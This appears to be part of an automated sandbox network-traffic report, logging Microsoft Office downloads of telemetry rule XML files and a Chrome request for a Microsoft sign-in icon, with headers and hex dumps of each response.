                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    49192.168.2.44979913.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:23 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:24 UTC491INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:23 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 468
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                    ETag: "0x8DC582B9C8E04C8"
                                                                    x-ms-request-id: b7bd549c-e01e-0003-5b3c-280fa8000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130323Z-r197bdfb6b46krmwag4tzr9x7c00000004t0000000008tvq
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    X-Cache-Info: L1_T2
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:24 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    50192.168.2.44980013.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:23 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:24 UTC491INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:23 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 428
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                    ETag: "0x8DC582BAC4F34CA"
                                                                    x-ms-request-id: 67fffc2c-401e-000a-5dae-264a7b000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130323Z-16849878b78p8hrf1se7fucxk800000006000000000055cp
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache-Info: L1_T2
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:24 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    51192.168.2.449802152.199.21.1754431704C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:24 UTC424OUTGET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1
                                                                    Host: aadcdn.msftauth.net
                                                                    Connection: keep-alive
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-10-28 13:03:25 UTC738INHTTP/1.1 200 OK
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                    Age: 18775776
                                                                    Cache-Control: public, max-age=31536000
                                                                    Content-MD5: 1jQlecEJaGhFO2st5KXLhg==
                                                                    Content-Type: image/svg+xml
                                                                    Date: Mon, 28 Oct 2024 13:03:24 GMT
                                                                    Etag: 0x8DB5C3F4AC59B47
                                                                    Last-Modified: Wed, 24 May 2023 10:11:51 GMT
                                                                    Server: ECAcc (lhc/78BB)
                                                                    Vary: Accept-Encoding
                                                                    X-Cache: HIT
                                                                    x-ms-blob-type: BlockBlob
                                                                    x-ms-lease-status: unlocked
                                                                    x-ms-request-id: 2ee1dbb1-b01e-00dc-3276-7e9a59000000
                                                                    x-ms-version: 2009-09-19
                                                                    Content-Length: 1636
                                                                    Connection: close
                                                                    2024-10-28 13:03:25 UTC1636INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 38 2c 31 34 48 31 30 56 33 34 48 33 38 56 31 34 6d 32 2c 32 32 48 38 56 31 32 48 34 30 56 33 36 4d 31 37 2e 36 38 38 2c 31 38 2e 38 56 32 38 2e 38 32 38 48 31 35 2e 35 33 31 56 32 31 2e 32 33 34 61 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 2e 36 37 32 2e 34 33 6c 2d 2e 32 36 36 2e 31 31 37 61
                                                                    Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    52192.168.2.44980913.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:24 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:25 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:25 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 419
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                    ETag: "0x8DC582BB32BB5CB"
                                                                    x-ms-request-id: 2760be74-301e-0096-200b-26e71d000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130325Z-16849878b78tg5n42kspfr0x480000000530000000009c2d
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:25 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    53192.168.2.44981013.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:24 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:24 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:24 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 494
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                    ETag: "0x8DC582BB8972972"
                                                                    x-ms-request-id: a89f9527-e01e-0033-5af4-244695000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130324Z-15b8d89586fvk4kmbg8pf84y88000000062g000000000b73
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:24 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    54192.168.2.44980613.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:24 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:24 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:24 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 499
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                    ETag: "0x8DC582B98CEC9F6"
                                                                    x-ms-request-id: afbd30f1-101e-007a-739c-27047e000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130324Z-r197bdfb6b4wmcgqdschtyp7yg00000004vg00000000aw71
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:24 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    55192.168.2.44980813.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:24 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:24 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:24 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 471
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                    ETag: "0x8DC582BB5815C4C"
                                                                    x-ms-request-id: ff77512b-301e-000c-17f4-24323f000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130324Z-15b8d89586fsx9lfqmgrbzpgmg0000000nx0000000004xg2
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:24 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    56192.168.2.44980713.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:24 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:24 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:24 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 415
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                    ETag: "0x8DC582B988EBD12"
                                                                    x-ms-request-id: 546431bf-201e-0085-0b72-2734e3000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130324Z-16849878b787bfsh7zgp804my400000003x000000000683t
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:24 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    57192.168.2.44981413.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:25 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:25 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:25 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 486
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                    ETag: "0x8DC582B92FCB436"
                                                                    x-ms-request-id: 01fc617d-601e-000d-05a4-262618000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130325Z-16849878b78q9m8bqvwuva4svc00000003gg00000000g1y2
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:25 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    58192.168.2.44981313.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:25 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:25 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:25 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 427
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                    ETag: "0x8DC582BA909FA21"
                                                                    x-ms-request-id: c9fe3c14-601e-0050-50d7-262c9c000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130325Z-15b8d89586ff5l62aha9080wv0000000067g00000000agnz
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:25 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    59192.168.2.44981213.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:25 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:25 UTC491INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:25 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 472
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                    ETag: "0x8DC582B9D43097E"
                                                                    x-ms-request-id: d63b5638-a01e-0021-2ab4-27814c000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130325Z-15b8d89586fwzdd8urmg0p1ebs0000000ffg000000003y7y
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache-Info: L1_T2
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
